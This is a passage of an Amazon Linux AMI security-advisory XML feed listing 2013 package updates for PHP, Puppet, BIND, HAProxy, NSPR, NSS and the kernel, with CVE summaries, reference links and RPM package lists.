23:18:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4113:
A buffer overflow flaw was found in the way PHP parsed deeply nested XML documents. If a PHP application used the xml_parse_into_struct() function to parse untrusted XML content, an attacker able to supply specially-crafted XML could use this flaw to crash the application or, possibly, execute arbitrary code with the privileges of the user running the PHP interpreter.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4113" title="" id="CVE-2013-4113" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:1049.html" title="" id="RHSA-2013:1049" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php54-bcmath" version="5.4.17" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-bcmath-5.4.17-2.40.amzn1.x86_64.rpm</filename></package><package name="php54-pspell" version="5.4.17" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pspell-5.4.17-2.40.amzn1.x86_64.rpm</filename></package><package name="php54-recode" version="5.4.17" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-recode-5.4.17-2.40.amzn1.x86_64.rpm</filename></package><package name="php54-common" version="5.4.17" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-common-5.4.17-2.40.amzn1.x86_64.rpm</filename></package><package name="php54-fpm" version="5.4.17" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-fpm-5.4.17-2.40.amzn1.x86_64.rpm</filename></package><package name="php54-odbc" version="5.4.17" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-odbc-5.4.17-2.40.amzn1.x86_64.rpm</filename></package><package name="php54-xmlrpc" version="5.4.17" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xmlrpc-5.4.17-2.40.amzn1.x86_64.rpm</filename></package><package name="php54-dba" version="5.4.17" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-dba-5.4.17-2.40.amzn1.x86_64.rpm</filename></package><package name="php54-xml" version="5.4.17" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xml-5.4.17-2.40.amzn1.x86_64.rpm</filename></package><package name="php54-mbstring" version="5.4.17" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mbstring-5.4.17-2.40.amzn1.x86_64.rpm</filename></package><package name="php54-debuginfo" version="5.4.17" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-debuginfo-5.4.17-2.40.amzn1.x86_64.rpm</filename></package><package name="php54-tidy" version="5.4.17" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-tidy-5.4.17-2.40.amzn1.x86_64.rpm</filename></package><package name="php54-devel" version="5.4.17" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-devel-5.4.17-2.40.amzn1.x86_64.rpm</filename></package><package name="php54" version="5.4.17" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-5.4.17-2.40.amzn1.x86_64.rpm</filename></package><package name="php54-soap" version="5.4.17" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-soap-5.4.17-2.40.amzn1.x86_64.rpm</filename></package><package name="php54-pgsql" version="5.4.17" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pgsql-5.4.17-2.40.amzn1.x86_64.rpm</filename></package><package name="php54-pdo" version="5.4.17" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pdo-5.4.17-2.40.amzn1.x86_64.rpm</filename></package><package name="php54-snmp" version="5.4.17" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-snmp-5.4.17-2.40.amzn1.x86_64.rpm</filename></package><package name="php54-mysqlnd" version="5.4.17" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysqlnd-5.4.17-2.40.amzn1.x86_64.rpm</filename></package><package name="php54-embedded" version="5.4.17" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-embedded-5.4.17-2.40.amzn1.x86_64.rpm</filename></package><package name="php54-mysql" version="5.4.17" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysql-5.4.17-2.40.amzn1.x86_64.rpm</filename></package><package name="php54-gd" version="5.4.17" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-gd-5.4.17-2.40.amzn1.x86_64.rpm</filename></package><package name="php54-process" version="5.4.17" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-process-5.4.17-2.40.amzn1.x86_64.rpm</filename></package><package name="php54-imap" version="5.4.17" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-imap-5.4.17-2.40.amzn1.x86_64.rpm</filename></package><package name="php54-cli" version="5.4.17" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-cli-5.4.17-2.40.amzn1.x86_64.rpm</filename></package><package name="php54-enchant" version="5.4.17" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-enchant-5.4.17-2.40.amzn1.x86_64.rpm</filename></package><package name="php54-mssql" version="5.4.17" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mssql-5.4.17-2.40.amzn1.x86_64.rpm</filename></package><package name="php54-intl" version="5.4.17" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-intl-5.4.17-2.40.amzn1.x86_64.rpm</filename></package><package name="php54-mcrypt" version="5.4.17" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mcrypt-5.4.17-2.40.amzn1.x86_64.rpm</filename></package><package name="php54-ldap" version="5.4.17" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-ldap-5.4.17-2.40.amzn1.x86_64.rpm</filename></package><package name="php54-pspell" version="5.4.17" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pspell-5.4.17-2.40.amzn1.i686.rpm</filename></package><package name="php54-snmp" version="5.4.17" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/php54-snmp-5.4.17-2.40.amzn1.i686.rpm</filename></package><package name="php54-bcmath" version="5.4.17" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/php54-bcmath-5.4.17-2.40.amzn1.i686.rpm</filename></package><package name="php54-ldap" version="5.4.17" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/php54-ldap-5.4.17-2.40.amzn1.i686.rpm</filename></package><package name="php54-xml" version="5.4.17" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xml-5.4.17-2.40.amzn1.i686.rpm</filename></package><package name="php54-mysql" version="5.4.17" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysql-5.4.17-2.40.amzn1.i686.rpm</filename></package><package name="php54-xmlrpc" version="5.4.17" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xmlrpc-5.4.17-2.40.amzn1.i686.rpm</filename></package><package name="php54-imap" version="5.4.17" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/php54-imap-5.4.17-2.40.amzn1.i686.rpm</filename></package><package name="php54-soap" version="5.4.17" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/php54-soap-5.4.17-2.40.amzn1.i686.rpm</filename></package><package name="php54-mcrypt" version="5.4.17" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mcrypt-5.4.17-2.40.amzn1.i686.rpm</filename></package><package name="php54-tidy" version="5.4.17" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/php54-tidy-5.4.17-2.40.amzn1.i686.rpm</filename></package><package name="php54-cli" version="5.4.17" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/php54-cli-5.4.17-2.40.amzn1.i686.rpm</filename></package><package name="php54-dba" version="5.4.17" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/php54-dba-5.4.17-2.40.amzn1.i686.rpm</filename></package><package name="php54-mysqlnd" version="5.4.17" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysqlnd-5.4.17-2.40.amzn1.i686.rpm</filename></package><package name="php54-devel" version="5.4.17" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/php54-devel-5.4.17-2.40.amzn1.i686.rpm</filename></package><package name="php54-pdo" version="5.4.17" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pdo-5.4.17-2.40.amzn1.i686.rpm</filename></package><package name="php54-process" version="5.4.17" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/php54-process-5.4.17-2.40.amzn1.i686.rpm</filename></package><package name="php54" version="5.4.17" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/php54-5.4.17-2.40.amzn1.i686.rpm</filename></package><package name="php54-gd" version="5.4.17" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/php54-gd-5.4.17-2.40.amzn1.i686.rpm</filename></package><package name="php54-embedded" version="5.4.17" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/php54-embedded-5.4.17-2.40.amzn1.i686.rpm</filename></package><package name="php54-mbstring" version="5.4.17" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mbstring-5.4.17-2.40.amzn1.i686.rpm</filename></package><package name="php54-pgsql" version="5.4.17" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pgsql-5.4.17-2.40.amzn1.i686.rpm</filename></package><package name="php54-mssql" version="5.4.17" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mssql-5.4.17-2.40.amzn1.i686.rpm</filename></package><package name="php54-enchant" version="5.4.17" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/php54-enchant-5.4.17-2.40.amzn1.i686.rpm</filename></package><package name="php54-fpm" version="5.4.17" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/php54-fpm-5.4.17-2.40.amzn1.i686.rpm</filename></package><package name="php54-intl" version="5.4.17" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/php54-intl-5.4.17-2.40.amzn1.i686.rpm</filename></package><package name="php54-debuginfo" version="5.4.17" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/php54-debuginfo-5.4.17-2.40.amzn1.i686.rpm</filename></package><package name="php54-recode" version="5.4.17" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/php54-recode-5.4.17-2.40.amzn1.i686.rpm</filename></package><package name="php54-odbc" version="5.4.17" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/php54-odbc-5.4.17-2.40.amzn1.i686.rpm</filename></package><package name="php54-common" version="5.4.17" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/php54-common-5.4.17-2.40.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-213</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-213: critical priority package update for puppet</title><issued date="2013-07-12 15:57:00" /><updated date="2014-09-15 23:18:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-3567:
974649:
CVE-2013-3567 puppet: remote code execution on master from unauthenticated clients
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3567" title="" id="CVE-2013-3567" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="puppet" version="2.7.22" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/puppet-2.7.22-1.0.amzn1.x86_64.rpm</filename></package><package name="puppet-debuginfo" version="2.7.22" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/puppet-debuginfo-2.7.22-1.0.amzn1.x86_64.rpm</filename></package><package name="puppet-server" version="2.7.22" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/puppet-server-2.7.22-1.0.amzn1.x86_64.rpm</filename></package><package name="puppet-debuginfo" version="2.7.22" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/puppet-debuginfo-2.7.22-1.0.amzn1.i686.rpm</filename></package><package name="puppet" version="2.7.22" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/puppet-2.7.22-1.0.amzn1.i686.rpm</filename></package><package name="puppet-server" version="2.7.22" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/puppet-server-2.7.22-1.0.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-214</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-214: important priority package update for bind</title><issued date="2013-08-07 21:20:00" /><updated date="2014-09-15 23:18:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4854:
A denial of service flaw was found in BIND. A remote attacker could use this flaw to send a specially-crafted DNS query to named that, when processed, would cause named to crash when rejecting the malformed query.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4854" title="" id="CVE-2013-4854" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:1114.html" title="" id="RHSA-2013:1114" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bind-debuginfo" version="9.8.2" release="0.17.rc1.30.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.17.rc1.30.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.17.rc1.30.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.17.rc1.30.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.17.rc1.30.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.17.rc1.30.amzn1.x86_64.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.17.rc1.30.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.17.rc1.30.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.17.rc1.30.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.17.rc1.30.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.17.rc1.30.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.17.rc1.30.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.17.rc1.30.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.17.rc1.30.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.17.rc1.30.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.17.rc1.30.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.17.rc1.30.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.17.rc1.30.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.17.rc1.30.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.17.rc1.30.amzn1.i686.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.17.rc1.30.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.17.rc1.30.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.17.rc1.30.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.17.rc1.30.amzn1.i686.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.17.rc1.30.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.17.rc1.30.amzn1.i686.rpm</filename></package><package name="bind" version="9.8.2" release="0.17.rc1.30.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.17.rc1.30.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-215</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-215: medium priority package update for haproxy</title><issued date="2013-08-07 21:21:00" /><updated date="2014-09-15 23:19:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-2175:
HAProxy 1.4 before 1.4.24 and 1.5 before 1.5-dev19, when configured to use hdr_ip or other "hdr_*" functions with a negative occurrence count, allows remote attackers to cause a denial of service (negative array index usage and crash) via an HTTP header with a certain number of values, related to the MAX_HDR_HISTORY variable.
974259:
CVE-2013-2175 haproxy: http_get_hdr()/get_ip_from_hdr2() MAX_HDR_HISTORY handling denial of service
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2175" title="" id="CVE-2013-2175" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="haproxy-debuginfo" version="1.4.22" release="5.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/haproxy-debuginfo-1.4.22-5.3.amzn1.x86_64.rpm</filename></package><package name="haproxy" version="1.4.22" release="5.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/haproxy-1.4.22-5.3.amzn1.x86_64.rpm</filename></package><package name="haproxy" version="1.4.22" release="5.3.amzn1" epoch="0" arch="i686"><filename>Packages/haproxy-1.4.22-5.3.amzn1.i686.rpm</filename></package><package name="haproxy-debuginfo" version="1.4.22" release="5.3.amzn1" epoch="0" arch="i686"><filename>Packages/haproxy-debuginfo-1.4.22-5.3.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-216</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-216: medium priority package update for nspr</title><issued date="2013-08-07 21:23:00" /><updated date="2014-09-15 23:19:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-1620:
It was discovered that NSS leaked timing information when decrypting TLS/SSL and DTLS protocol encrypted records when CBC-mode cipher suites were used. A remote attacker could possibly use this flaw to retrieve plain text from the encrypted packets by using a TLS/SSL or DTLS server as a padding oracle.
CVE-2013-0791:
An out-of-bounds memory read flaw was found in the way NSS decoded certain certificates. If an application using NSS decoded a malformed certificate, it could cause the application to crash.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0791" title="" id="CVE-2013-0791" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1620" title="" id="CVE-2013-1620" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:1144.html" title="" id="RHSA-2013:1144" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nspr-devel" version="4.9.5" release="2.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/nspr-devel-4.9.5-2.17.amzn1.x86_64.rpm</filename></package><package name="nspr-debuginfo" version="4.9.5" release="2.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/nspr-debuginfo-4.9.5-2.17.amzn1.x86_64.rpm</filename></package><package name="nspr" version="4.9.5" release="2.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/nspr-4.9.5-2.17.amzn1.x86_64.rpm</filename></package><package name="nspr" version="4.9.5" release="2.17.amzn1" epoch="0" arch="i686"><filename>Packages/nspr-4.9.5-2.17.amzn1.i686.rpm</filename></package><package name="nspr-devel" version="4.9.5" release="2.17.amzn1" epoch="0" arch="i686"><filename>Packages/nspr-devel-4.9.5-2.17.amzn1.i686.rpm</filename></package><package name="nspr-debuginfo" version="4.9.5" release="2.17.amzn1" epoch="0" arch="i686"><filename>Packages/nspr-debuginfo-4.9.5-2.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-217</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-217: medium priority package update for nss</title><issued date="2013-08-07 21:23:00" /><updated date="2014-09-15 23:20:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-1620:
It was discovered that NSS leaked timing information when decrypting TLS/SSL and DTLS protocol encrypted records when CBC-mode cipher suites were used. A remote attacker could possibly use this flaw to retrieve plain text from the encrypted packets by using a TLS/SSL or DTLS server as a padding oracle.
CVE-2013-0791:
An out-of-bounds memory read flaw was found in the way NSS decoded certain certificates. If an application using NSS decoded a malformed certificate, it could cause the application to crash.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0791" title="" id="CVE-2013-0791" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1620" title="" id="CVE-2013-1620" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:1144.html" title="" id="RHSA-2013:1144" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nss-debuginfo" version="3.14.3" release="4.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-debuginfo-3.14.3-4.29.amzn1.x86_64.rpm</filename></package><package name="nss-sysinit" version="3.14.3" release="4.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-sysinit-3.14.3-4.29.amzn1.x86_64.rpm</filename></package><package name="nss" version="3.14.3" release="4.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-3.14.3-4.29.amzn1.x86_64.rpm</filename></package><package name="nss-devel" version="3.14.3" release="4.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-devel-3.14.3-4.29.amzn1.x86_64.rpm</filename></package><package name="nss-pkcs11-devel" version="3.14.3" release="4.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-pkcs11-devel-3.14.3-4.29.amzn1.x86_64.rpm</filename></package><package name="nss-tools" version="3.14.3" release="4.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-tools-3.14.3-4.29.amzn1.x86_64.rpm</filename></package><package name="nss" version="3.14.3" release="4.29.amzn1" epoch="0" arch="i686"><filename>Packages/nss-3.14.3-4.29.amzn1.i686.rpm</filename></package><package name="nss-tools" version="3.14.3" release="4.29.amzn1" epoch="0" arch="i686"><filename>Packages/nss-tools-3.14.3-4.29.amzn1.i686.rpm</filename></package><package name="nss-devel" version="3.14.3" release="4.29.amzn1" epoch="0" arch="i686"><filename>Packages/nss-devel-3.14.3-4.29.amzn1.i686.rpm</filename></package><package name="nss-debuginfo" version="3.14.3" release="4.29.amzn1" epoch="0" arch="i686"><filename>Packages/nss-debuginfo-3.14.3-4.29.amzn1.i686.rpm</filename></package><package name="nss-sysinit" version="3.14.3" release="4.29.amzn1" epoch="0" arch="i686"><filename>Packages/nss-sysinit-3.14.3-4.29.amzn1.i686.rpm</filename></package><package name="nss-pkcs11-devel" version="3.14.3" release="4.29.amzn1" epoch="0" arch="i686"><filename>Packages/nss-pkcs11-devel-3.14.3-4.29.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-218</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-218: medium priority package update for kernel</title><issued date="2013-08-13 21:32:00" /><updated date="2014-09-15 23:25:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-3301:
* A NULL pointer dereference flaw was found in the Linux kernel's ftrace and function tracer implementations. A local user who has the CAP_SYS_ADMIN capability could use this flaw to cause a denial of service.
CVE-2013-3225:
The rfcomm_sock_recvmsg function in net/bluetooth/rfcomm/sock.c in the Linux kernel before 3.9-rc7 does not initialize a certain length variable, which allows local users to obtain sensitive information from kernel stack memory via a crafted recvmsg or recvfrom system call.
955649:
CVE-2013-3225 Kernel: Bluetooth: RFCOMM - missing msg_namelen update in rfcomm_sock_recvmsg
* Information leak flaws in the Linux kernel could allow a local, unprivileged user to leak kernel memory to user-space.
CVE-2013-3224:
The bt_sock_recvmsg function in net/bluetooth/af_bluetooth.c in the Linux kernel before 3.9-rc7 does not properly initialize a certain length variable, which allows local users to obtain sensitive information from kernel stack memory via a crafted recvmsg or recvfrom system call.
955599:
CVE-2013-3224 Kernel: Bluetooth: possible info leak in bt_sock_recvmsg()
* Information leaks in the Linux kernel could allow a local, unprivileged user to leak kernel memory to user-space.
* Information leak flaws in the Linux kernel could allow a local, unprivileged user to leak kernel memory to user-space.
CVE-2013-3222:
The vcc_recvmsg function in net/atm/common.c in the Linux kernel before 3.9-rc7 does not initialize a certain length variable, which allows local users to obtain sensitive information from kernel stack memory via a crafted recvmsg or recvfrom system call.
955216:
CVE-2013-3222 Kernel: atm: update msg_namelen in vcc_recvmsg()
* Information leaks in the Linux kernel could allow a local, unprivileged user to leak kernel memory to user-space.
* Information leak flaws in the Linux kernel could allow a local, unprivileged user to leak kernel memory to user-space.
CVE-2013-2852:
Format string vulnerability in the b43_request_firmware function in drivers/net/wireless/b43/main.c in the Broadcom B43 wireless driver in the Linux kernel through 3.9.4 allows local users to gain privileges by leveraging root access and including format string specifiers in an fwpostfix modprobe parameter, leading to improper construction of an error message.
969518:
CVE-2013-2852 kernel: b43: format string leaking into error msgs
* A format string flaw was found in the b43_do_request_fw() function in the Linux kernel's b43 driver implementation. A local user who is able to specify the "fwpostfix" b43 module parameter could use this flaw to cause a denial of service or, potentially, escalate their privileges.
CVE-2013-2635:
The rtnl_fill_ifinfo function in net/core/rtnetlink.c in the Linux kernel before 3.8.4 does not initialize a certain structure member, which allows local users to obtain sensitive information from kernel stack memory via a crafted application.
924690:
CVE-2013-2635 kernel: Information leak in the RTNETLINK component
* Information leak flaws in the Linux kernel could allow a local, unprivileged user to leak kernel memory to user-space.
CVE-2013-2634:
net/dcb/dcbnl.c in the Linux kernel before 3.8.4 does not initialize certain structures, which allows local users to obtain sensitive information from kernel stack memory via a crafted application.
924689:
CVE-2013-2634 kernel: Information leak in the Data Center Bridging (DCB) component
* Information leak flaws in the Linux kernel could allow a local, unprivileged user to leak kernel memory to user-space.
CVE-2013-2234:
The (1) key_notify_sa_flush and (2) key_notify_policy_flush functions in net/key/af_key.c in the Linux kernel before 3.10 do not initialize certain structure members, which allows local users to obtain sensitive information from kernel heap memory by reading a broadcast message from the notify interface of an IPSec key_socket.
980995:
CVE-2013-2234 Kernel: net: information leak in AF_KEY notify
CVE-2013-2232:
The ip6_sk_dst_check function in net/ipv6/ip6_output.c in the Linux kernel before 3.10 allows local users to cause a denial of service (system crash) by using an AF_INET6 socket for a connection to an IPv4 interface.
981552:
CVE-2013-2232 Kernel: ipv6: using ipv4 vs ipv6 structure during routing lookup in sendmsg
CVE-2013-2128:
The tcp_read_sock function in net/ipv4/tcp.c in the Linux kernel before 2.6.34 does not properly manage skb consumption, which allows local users to cause a denial of service (system crash) via a crafted splice system call for a TCP socket.
968484:
CVE-2013-2128 Kernel: net: oops from tcp_collapse() when using splice(2)
* A flaw was found in the tcp_read_sock() function in the Linux kernel's IPv4 TCP/IP protocol suite implementation in the way socket buffers (skb) were handled. A local, unprivileged user could trigger this issue via a call to splice(), leading to a denial of service.
CVE-2013-1848:
fs/ext3/super.c in the Linux kernel before 3.8.4 uses incorrect arguments to functions in certain circumstances related to printk input, which allows local users to conduct format-string attacks and possibly gain privileges via a crafted application.
920783:
CVE-2013-1848 kernel: ext3: format string issues
* A format string flaw was found in the ext3_msg() function in the Linux kernel's ext3 file system implementation. A local user who is able to mount an ext3 file system could use this flaw to cause a denial of service or, potentially, escalate their privileges.
CVE-2013-1059:
net/ceph/auth_none.c in the Linux kernel through 3.10 allows remote attackers to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact via an auth_reply message that triggers an attempted build_request operation.
977356:
CVE-2013-1059 Kernel: libceph: Fix NULL pointer dereference in auth client code
CVE-2013-0914:
The flush_signal_handlers function in kernel/signal.c in the Linux kernel before 3.8.4 preserves the value of the sa_restorer field across an exec operation, which makes it easier for local users to bypass the ASLR protection mechanism via a crafted application containing a sigaction system call.
920499:
CVE-2013-0914 Kernel: sa_restorer information leak
* An information leak was found in the Linux kernel's POSIX signals implementation. A local, unprivileged user could use this flaw to bypass the Address Space Layout Randomization (ASLR) security feature.
CVE-2012-6548:
The udf_encode_fh function in fs/udf/namei.c in the Linux kernel before 3.6 does not initialize a certain structure member, which allows local users to obtain sensitive information from kernel heap memory via a crafted application.
922353:
CVE-2012-6548 Kernel: udf: information leak on export
* Information leak flaws in the Linux kernel could allow a local, unprivileged user to leak kernel memory to user-space.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6548" title="" id="CVE-2012-6548" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0914" title="" id="CVE-2013-0914" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1059" title="" id="CVE-2013-1059" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1848" title="" id="CVE-2013-1848" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2128" title="" id="CVE-2013-2128" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2232" title="" id="CVE-2013-2232" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2234" title="" id="CVE-2013-2234" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2634" title="" id="CVE-2013-2634" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2635" title="" 